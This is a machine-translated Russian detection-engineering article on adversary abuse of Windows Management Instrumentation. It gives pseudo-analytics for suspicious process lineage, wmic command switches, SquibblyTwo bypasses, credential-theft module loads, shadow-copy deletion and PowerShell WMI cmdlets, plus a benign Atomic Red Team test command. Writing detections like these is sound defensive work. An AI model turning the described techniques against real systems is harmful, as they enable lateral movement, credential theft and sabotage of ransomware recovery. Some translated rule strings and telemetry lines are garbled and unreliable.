Решения по обеспечению безопасности конечных точек, использующие данные о событиях AMSI, будут получать события AMSI, связанные с торговлей WMI, включая попытки горизонтального перемещения и постоянные подписки на события WMI. AMSI также может быть полезен для обнаружения злонамеренного использования командлета PowerShell Get-WMIObject .

Обнаружение

У нас есть более 85 средств аналитики обнаружения, которые ищут вредоносные и подозрительные действия WMI. Следующие возможности обнаружения представляют собой синтез некоторых из наших наиболее эффективных аналитических методов.

Примечание. Эти аналитические средства обнаружения могут потребовать настройки.

Подозрительное происхождение процесса

Как правило, доверенные двоичные файлы и известные административные инструменты и процессы инициируют активность WMI. Таким образом, имеет смысл искать известные плохие процессы, запускающие WMI, или отклонения от ожидаемых, когда законный, но необычный двоичный файл Windows порождает WMI или порождается из него. Ниже представлено объединение нескольких средств аналитики, которые могут обнаруживать широкий спектр угроз, начиная от действий красной команды и заканчивая веб-шеллами и майнерами монет:

 parent_process == wmiprvse. exe
&&
process == ('rundll32.exe' || 'msbuild.exe' || 'powershelle.exe' || 'cmd.exe' || 'mshta.exe') 
Подозрительные команды

Поиск подозрительной командной строки параметры — еще один надежный показатель злого умысла. Некоторые фреймворки red team и post-exploitation будут создавать уникальные и неподписанные двоичные файлы или команды удаленно, используя хорошо известную команду process call create , и у нас есть несколько различных методов обнаружения, которые предупреждали нас о связанной активности на протяжении многих лет. Потенциально подозрительные переключатели команд WMI включают создать , узел: , обработать и вызвать . Конечно, вредоносность этих команд зависит от контекста, поэтому следующие команды могут потребовать настройки или генерировать большое количество ложных срабатываний:

 process == wmic.exe
&&
command_line_includes ('create' || 'node:' || 'process' || 'call') 
Необычные загрузки модулей

Отслеживая и обнаруживая загрузки модулей, вы можете обнаружить различные вредоносные действия, включая уклонение от защиты и кража учетных данных. В случаях, когда злоумышленник использует WMI для кражи учетных данных, рассмотрите возможность поиска выполнения wmiprvse.exe (или его дочерние процессы) с необычными загрузками модулей, такими как samlib.dll или vaultcli.dll . WMI также является полезным средством для обхода элементов управления приложениями, и мы часто видим злоумышленников — реальных и смоделированных — использующих метод обхода WMI, называемый «SquibblyTwo». Следующая аналитика псевдообнаружения разработана специально для обнаружения обходов управления приложениями, но вы, вероятно, можете адаптировать ее для обнаружения других угроз, заменив другую DLL или удалив команду:

 процесс == wmic.exe
&&
command_line_includes ('формат:')
&&
module_load == ('jscript.dll' || 'vbscript.dll') 
Продукты Office, порождающие WMI:

Это почти всегда вредоносно, когда wmic.exe порождается как дочерний процесс Microsoft Office и подобных продуктов. Таким образом, имеет смысл изучить цепочку выполнения и последующих действий, когда это происходит. Ниже приводится неисчерпывающий пример аналитики, который улавливает некоторые из этих действий:

 parent_process == ('winword.exe' || 'excel.exe')
&&
process == wmic.exe 
WMI reconnaissance

Reconnaissance труднее обнаружить, поскольку он очень похож на обычное поведение администратора. Несмотря на это, мы обнаруживаем относительно большое количество злоумышленников, использующих WMI для быстрого сбора информации о домене, такой как пользователи, группы или компьютеры в домене. Следующее может помочь вам обнаружить связанную активность:

 процесс == wmic.exe
&&
command_line_includes ('\ldap' || 'ntdomain') 
Удаление теневой копии

Операторы программ-вымогателей нередко используют WMI для удаления теней томов, что значительно усложняет процесс восстановления доступа к зашифрованным системам и файлам. Если вы хотите обнаружить программы-вымогатели с помощью WMI для удаления теневых копий, рассмотрите возможность поиска выполнения wmic. exe с командными строками, включая shadowcopy или delete .

 процесс == wmic.exe
&&
command_line_includes («теневая копия» && «удалить») 
Подозрительные командлеты PowerShell

Существует множество командлетов PowerShell по умолчанию, которые позволяют администраторам использовать WMI через PowerShell. И злоумышленники, и администраторы используют эти командлеты для запроса операционной системы или выполнения команд локально или удаленно. Такие командлеты, как Get-WMIObject , часто используются для разведки.

 процесс == powershell.exe
&&
command_line_includes ('invoke-wmimethod' || 'invoke-cimmethod' || 'get-wmiobject' || 'get-ciminstance' || 'wmiclass') 

Отсеивание ложных срабатываний

Журналы сетевых потоков и сетевой трафик WMI обычно шифруются, поэтому они будут смешиваться с другим сетевым трафиком и могут генерировать большое количество ложноотрицательных результатов. Это еще одна причина — наряду с минимальным ведением журнала и знанием WMI защитником — почему злоумышленники любят WMI. Мониторинг журнала аутентификации для WMI требует глубоких знаний об учетных записях и типичных действиях пользователей, что сложно для большинства групп безопасности. Кроме того, журналы проверки подлинности Windows являются подробными, зашумленными, и их не так просто ввести в SIEM или аналогичную платформу.

Тестирование

Начните тестирование средств защиты от Windows Management Instrumentation с помощью Atomic Red Team — среды тестирования с открытым исходным кодом, состоящей из небольших переносимых тестов обнаружения, сопоставленных с MITRE ATT&CK.

Начало работы

Просмотр атомарных тестов для T1047: Инструментарий управления Windows. В большинстве случаев этого должно быть достаточно, чтобы генерировать полезный сигнал для защитников.

Запустите этот тест в системе Windows с помощью командной строки:
 wmic /node:"127.0.0.1" process call create “calc.exe” 

Useful telemetry will include:
Visibility Telemetry Collection
Visibility :

Мониторинг процессов

Телеметрия:

дочерних процессов wmiprivse. exe

Коллекция:

EDR, событие Sysmon с идентификатором 1 и событие Windows с идентификатором 4688 должны собирать соответствующие данные телеметрии.

Видимость :

Мониторинг команд

Телеметрия:

«процесс», «создание»

Сбор :

EDR, Sysmon Event ID 4, и telemetry 8 должны собирать соответствующие идентификаторы событий Windows 6 и telemetry 8.

Просмотрите и повторите

Теперь, когда вы выполнили один или несколько стандартных тестов и проверили ожидаемые результаты, полезно ответить на несколько неотложных вопросов:

  • Были ли обнаружены какие-либо ваши действия?
  • Были ли какие-либо ваши действия заблокированы или предотвращены?
  • Были ли ваши действия видны в журналах или другой защитной телеметрии?

Повторите этот процесс, выполнив дополнительные тесты, связанные с этим методом. Вы также можете создавать и добавлять собственные тесты.

Наш веб-сайт использует файлы cookie, чтобы обеспечить вам лучший просмотр. Дополнительную информацию можно найти в нашей Политике конфиденциальности.
X

Управление активами для инструментария управления Windows (WMI)